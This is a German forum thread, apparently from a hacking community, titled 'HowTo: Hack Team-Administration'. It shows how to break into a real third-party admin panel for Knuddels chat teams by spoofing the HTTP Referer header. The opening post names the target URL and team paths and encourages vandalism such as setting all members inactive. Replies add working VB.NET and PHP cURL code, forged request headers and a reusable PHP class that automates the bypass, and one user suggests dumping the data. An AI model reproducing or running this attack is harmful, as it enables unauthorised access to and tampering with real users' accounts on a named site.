-
25.10.2011, 07:40 #1
- Registriert seit
- 01.07.2011
- Beiträge
- 103
Thanked 54 Times in 45 PostsHowTo: Hack Team-Administration
Mir ist gerade aufgefallen dass alle Teams so ziemlich das Gleiche System nutzen. "Programmiert" wurde es von wolltihrmichverarschen, der mal überhaupt keinerlei Kenntnisse besitzt
Das System dient in erster Linie dazu um die Anwesenheit eines Teammitgliedes zu ändern. Früher war es möglich, auch die Administration der Teamleiter (durch anhängen von admin.php) zu betreten um dann Beispielsweise Teammitglieder zu Löschen oder zu erstellen Leider aber wurd der "Ersteller" bereits informiert und hat kurzerhand eine HTTP-Authentification hinzugefügt.
Wie kommt man nun auf die Administration?
Man gehe einfach auf der URL http://knuddels-magdeburg.de/bugs/checkout/.
Das Fett markierte Wort ist das jeweilige Team.
Folgende Teams habe ich mittlerweile herausgefunden:
- foto
- bugs
- spiele
- iphone
- smileywars
Es erscheint eine Meldung, dass du die Seite nicht betreten darfst, klingt logisch. Wie aber bekommst du nun zugriff darauf?
Ganz einfach. Da wolltihrmichverarschen nicht der Hellste Kopf ist, hat er einfach nur eine Referrer-Überprüfung eingesetzt. Da das "System" als iFrame im Knuddels-Forum eingebunden wird, sollen die "Teammitglieder" direkte Einsicht bekommen, sobald diese das Forum öffnen.
Es gibt 3 einfache Schritte.
Schritt 1: Öffnen der Seite
Öffnet die Seite der Administration. Beispielsweise http://knuddels-magdeburg.de/bugs/checkout/.
Schritt 2: Öffnen des Forums
Auf der "Fehlerseite" erscheint eine verlinkung zum internen Forum. Öffnet diese und modifiziert nun in Realtime (Beispielsweise mittels Firebug) eine Verlinkung im Forum und tragt dort die URL der zuvor angewählten Administration ein (Beispielsweise http://knuddels-magdeburg.de/bugs/checkout/).
Klickt nun auf diese verlinkung und ihr erhaltet sofortigen Zugang, da als "Referrer" das jeweilige Forum gestored wurde.
Schritt 3: Macht was ihr wollt
Ihr könnt nun machen was ihr möchtet. Am besten alle Teammitglieder inaktiv melden oder was weiß ich
ip-adressen werden nicht gespeichert, des ist normal da er sich keinerlei Gedanken um der Sicherheit macht ^^ Notfalls nimmt man mal nen Proxy ^^
Aufgrund der großen Nachfrage, hier noch ein kleines Video-Tutorial:
[HIDE=10]
Wollte im Video anstatt "firebug" "Firefuck" sagen, verzeiht es mir x'D
[/HIDE]
Achja, vevor ichs vergesse:
Das Tutorial (Egal ob Text oder Video) ist ausschließlich zu lernzwecken gedacht und beabsichtigt keinerlei illegalen aktivitäten xDD
Mfg
Batzi
-
25.10.2011, 07:56 #2
- Registriert seit
- 01.07.2011
- Beiträge
- 103
Thanked 54 Times in 45 PostsHowTo: Hack Team-Administration
Firebug ist ein Addon für Firefox. Dies musst du installieren (https://addons.mozilla.org/de/firefox/addon/firebug/).
Es erscheint in der Rechten oberen Ecke ein "Käfer". Wenn du dort drauf klickst erscheint unten im Firefox ein Fensterchen. Dort gehst du auf das linke Icon (Der blaue Kasten) und klickst irgendein Link im Forum damit an. Dann kannst du die Verlinkung editieren (href)
-
25.10.2011, 07:57 #3
- Registriert seit
- 17.09.2012
- Beiträge
- 1.865
Thanked 384 Times in 258 PostsHowTo: Hack Team-Administration
@Batzi
ok hab ich gefunden aber was bringt das ?Geändert von Darkfield (20.02.2014 um 07:29 Uhr) Grund: Vollzitat entfernt
-
25.10.2011, 08:01 #4
- Registriert seit
- 01.07.2011
- Beiträge
- 103
Thanked 54 Times in 45 PostsHowTo: Hack Team-Administration
Was bringt was? Die live-bearbeitung des Links?
Wenn du genau lesen würdest, wüsstest du es.
Du erhälst nur Zugang zur Administration, wenn das Interne Forum als "Verweis" im Browser gespeichert wurde (HTTP-REFERRER). Diesen "Verweis" erhälst du indem du diesen setzt (Beispielsweise über den Firebug-Trick).
Man könnte nun auch ein PHP-Script erstellen, der dann das jeweilige Forum als Referrer mitsendet und die Administration beispielsweise über cURL zieht.
-
25.10.2011, 08:19 #5
HowTo: Hack Team-Administration
@xX Chriss Xx
Am besten lässt du es. Wie Batzi schon gesagt hat, musst du HTML-Kentnisse haben, um dieses TUT zu verstehen. Da du sie ja anscheinend nicht hast, bringt dir das TUT auch nichts, und du musst nichts weiter Posten. Wenn du jeden Schritt erklärt haben musst, dann kommst du mit dem Endergebnis sowieso nicht zurecht. Also lass es doch direkt, danke.
zum TUT: Nettes Tut. Gefällt mir gut, ist für manch jemanden sicherlich sehr nützlich. Weiter so.Geändert von Darkfield (20.02.2014 um 07:29 Uhr) Grund: Vollzitat entfernt
-
25.10.2011, 10:02 #6
HowTo: Hack Team-Administration
Also ist das der offizielle Kram, den Knuddels benutzt?
Kann da nicht mal jemand die Daten dumpen?„Es sind nicht unsere Fähigkeiten, die zeigen, wer wir wirklich sind, es sind unsere Entscheidungen.“
- Albus Dumbledore, Harry Potter 2
/guestchat registerGuest
-
25.10.2011, 10:04 #7
- Registriert seit
- 01.07.2011
- Beiträge
- 103
Thanked 54 Times in 45 PostsHowTo: Hack Team-Administration
Nein eine "Offizielle" Administration von Knuddels ist dies nicht.
wolltihrmichverarschen hat diese geproggt und stellt dies für die einzelnen Teams bereit.
-
25.10.2011, 13:13 #8
HowTo: Hack Team-Administration
Gutes Tut, echt ein noobiger Schutz - man braucht nur die URL.
VB.NET Lösung:
Code:Dim client As New Net.WebClient() client.Headers.Add("Referer", "http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2123754") WebBrowser1.DocumentText = client.DownloadString("http://knuddels-magdeburg.de/bugs/checkout/")
-
25.10.2011, 13:35 #9Gelöschter BenutzerGast
HowTo: Hack Team-Administration
Gutes Tut, echt ein noobiger Schutz - man brauch nur den Referer ändern.
PHP Lösung:
PHP-Code:<?php
$ch = curl_init("http://knuddels-magdeburg.de/bugs/checkout/");
curl_setopt($ch, CURLOPT_REFERER, "http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2123754");
curl_exec($ch);
curl_close($ch);
?>
Man kann das ganze auch mit Live HTTP Replay realisieren. HTTP Header:
Code:Host: knuddels-magdeburg.de User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2123754
Die beiden Javascript Scripts müssen auch heruntergeladen werden, ansonsten läuft das ganze nicht
-
25.10.2011, 13:39 #10
- Registriert seit
- 01.07.2011
- Beiträge
- 103
Thanked 54 Times in 45 PostsHowTo: Hack Team-Administration
Und hier eine Beispielklasse in PHP. Natürlich muss die cURL extension für PHP installiert/aktiviert sein.
PHP-Code:<?php
/*
Team-Administration Class
@Author Batzi
@Version 1.0
*/
class TeamCheckout {
protected static $team = "";
protected static $referrer = "";
function setTeam($name) {
self::$team = $name;
}
function output() {
self::getForumLink();
self::getAdministration();
}
function getForumLink() {
$html = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/");
preg_match_all("/<a href='(.+)'>Forum<\/a>/Uis", $html, $data);
self::$referrer = $data[1][0];
}
function getAdministration() {
$html = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/");
print $html;
}
function getRequest($site) {
$socket = curl_init();
curl_setopt($socket, CURLOPT_REFERER, self::$referrer);
curl_setopt($socket, CURLOPT_URL, $site);
curl_setopt($socket, CURLOPT_RETURNTRANSFER, 1);
return curl_exec($socket);
curl_close($socket);
}
}
header("Content-Type: text/html; charset=UTF-8");
/* How to Use: */
$team = new TeamCheckout;
/*
Gültige Teams:
bugs
smileywars
iphone
foto
*/
$team->setTeam("foto");
$team->output();
?>
Ähnliche Themen
-
[Kritik] Technische Administration uvm.
Von Prinzessin Paat im Forum FeedbackAntworten: 18Letzter Beitrag: 06.02.2013, 15:47 -
Suche League of Legends Ranked Team / Elo Team
Von Silidor im Forum Gaming AllgemeinAntworten: 2Letzter Beitrag: 20.07.2012, 22:36 -
[Kritik] Verheimlichungen von der Seite der Administration
Von Comu im Forum FeedbackAntworten: 3Letzter Beitrag: 05.07.2012, 23:56
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.